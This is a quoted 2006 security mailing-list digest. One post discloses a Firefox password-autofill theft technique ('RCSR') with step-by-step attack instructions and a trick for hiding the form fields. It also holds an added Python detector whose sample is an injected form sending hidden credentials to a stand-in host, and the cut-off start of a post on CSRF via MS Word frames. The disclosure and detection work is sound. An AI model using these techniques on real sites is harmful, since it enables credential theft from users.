Thread-topic: Stealing FF passwords and CSRF with MS Word
> Message: 2
> Date: Fri, 24 Nov 2006 13:41:55 +0000
> From: pagvac <unknown.pentester@xxxxxxxxx>
> Subject: [Full-disclosure] RCSR fun: stealing FF passwords the easy
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Content-Type: text/plain; charset="iso-8859-1"
> RCSR (Reverse Cross-Site Request) attacks, discovered by Robert Chapin,
> make the theft of passwords in Firefox extremely trivial. I encourage
> you to try the attack as it can be kind of a shocking experience.
> 1. User logs into www.target.com through a typical HTML login form
> 2. Firefox asks the user if he/she wants to save the password -
> provided that FF never asked the user to save the password for that
> site before ("Remember passwords for sites" under "Options/Security"
> must be *enabled*)
> 3. Victim user clicks on "Remember"
> 4. Victim user accesses an HTML page on www.target.com containing an
> injected HTML form with the username and password input names *equal*
> to the legitimate login form from step 1
> 5. Firefox automatically fills out the form with the original username
> and password values
> 6. Victim user clicks on a malicious link
> 7. Credentials get sent to evil site!
> Now, the form can be completely invisible by adding a bit of HTML to
> the form inputs. I managed to create a form in which all you need is
> trick the victim user to click on an image.
> Attack walk through:
> 1. Enter any fake credentials on
> http://ikwt.com/projects/RCSR/legit_form.html and click on "Login"
> 2. If "Remember passwords for sites" is enabled, FF should prompt you
> to save the password.
> 3. Click on "Remember"
> 4. Now, in order to illustrate that FF will automatically fill in the
> credentials on any form located on the same site which uses input
> names *equal* to the legitimate form, access the following URL:
> If it worked, you should see the username and password field filled in
> automatically by FF. Of course, an evil form like this looks very
> suspicious, but this is just an example to make the point that FF
> trusts and fills in the form simply because it's located on the same
> site and uses input names equal to the legitimate form.
> Now, in order to make our evil form more effective we just added the
> following line in the username and password fields:
> style="display: none;"
> Finally, we change our submit button for an image that will make a
> good bait. In this case we choose beautiful Scarlett Johansson :-)
> If you click on the image, you should see your credentials forwarded
> to Google within the URL:
> plain HTML tags. Also, there is *no* patch yet. Apparently this has
> been widely exploited on myspace. I recommend everyone to research
> this attack as it's highly exploitable on sites in which users can
> insert HTML - either through legitimate features (i.e.: posts) or by
> exploiting security bugs such as HTML injection
> - tested successfully on Mozilla Firefox 2.0
> the 'submit()' method (only visiting the evil page is required in this
> Check out the following links for more info:
> http://www.kriptopolis.org/robo-de-contrasenas-en-firefox (in Spanish)
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: FF_remember_passwords.JPG
> Type: image/jpeg
> Size: 8310 bytes
> Desc: not available
> Url :
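A defender-side check that follows from the walk-through above, added here as an example and not code from either post: it scans user-submitted HTML for a form that reuses the site's login field names and either posts off-site or hides those fields, the two traits pagvac describes. The host name, the login field names and the two sample fragments are constructed for the example.

```python
"""Flag user-supplied HTML that looks like an injected RCSR form (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormCollector(HTMLParser):
    """Collect every <form> with the attribute dicts of its <input> children."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def _is_hidden(attrs):
    """True for the display:none trick from the post, or a type=hidden input."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return "display:none" in style or (attrs.get("type") or "").lower() == "hidden"


def find_rcsr_forms(html, page_host, login_field_names):
    """Return findings for forms that reuse the login field names and either
    post to another host or hide the reused fields; benign forms are skipped."""
    collector = _FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        reused = {i.get("name") for i in form["inputs"]} & set(login_field_names)
        if not reused:
            continue  # no overlap with the login form: Firefox would not autofill it
        action_host = urlparse(form["action"]).hostname  # None for relative actions
        off_site = action_host is not None and action_host != page_host
        hidden = any(_is_hidden(i) for i in form["inputs"] if i.get("name") in reused)
        if off_site or hidden:
            findings.append({"action": form["action"], "reused": sorted(reused),
                             "off_site": off_site, "hidden": hidden})
    return findings


# Constructed samples: a post carrying an injected form, and the site's own login form.
INJECTED_POST = ('<p>look at this</p><form action="http://evil.example/c" method="get">'
                 '<input type="text" name="user" style="display: none;">'
                 '<input type="password" name="pass" style="display: none;">'
                 '<input type="image" src="bait.jpg"></form>')
LEGIT_LOGIN = ('<form action="/login" method="post"><input type="text" name="user">'
               '<input type="password" name="pass"><input type="submit"></form>')
```

Run it with the real login form's field names and the page's own host; a hit on content that users were allowed to submit is the signal that the site needs stricter HTML filtering of `<form>` and `<input>`.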
> Message: 7
> Date: Fri, 24 Nov 2006 19:12:32 +0000
> From: "David Kierznowski" <david.kierznowski@xxxxxxxxx>
> Subject: [Full-disclosure] CSRF with MS Word
> To: full-disclosure@xxxxxxxxxxxxxxxxx, "Webappsec Mail List"
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
> CSRF with MS Word
> Our attack vector is found in exploiting MS Word's frame capabilities:
> By creating malicious frames in a document and pointing them to a
> malicious URL, we can exploit multiple, persistent (well almost, this
> is limited) CSRF vulnerabilities (and possibly the browser).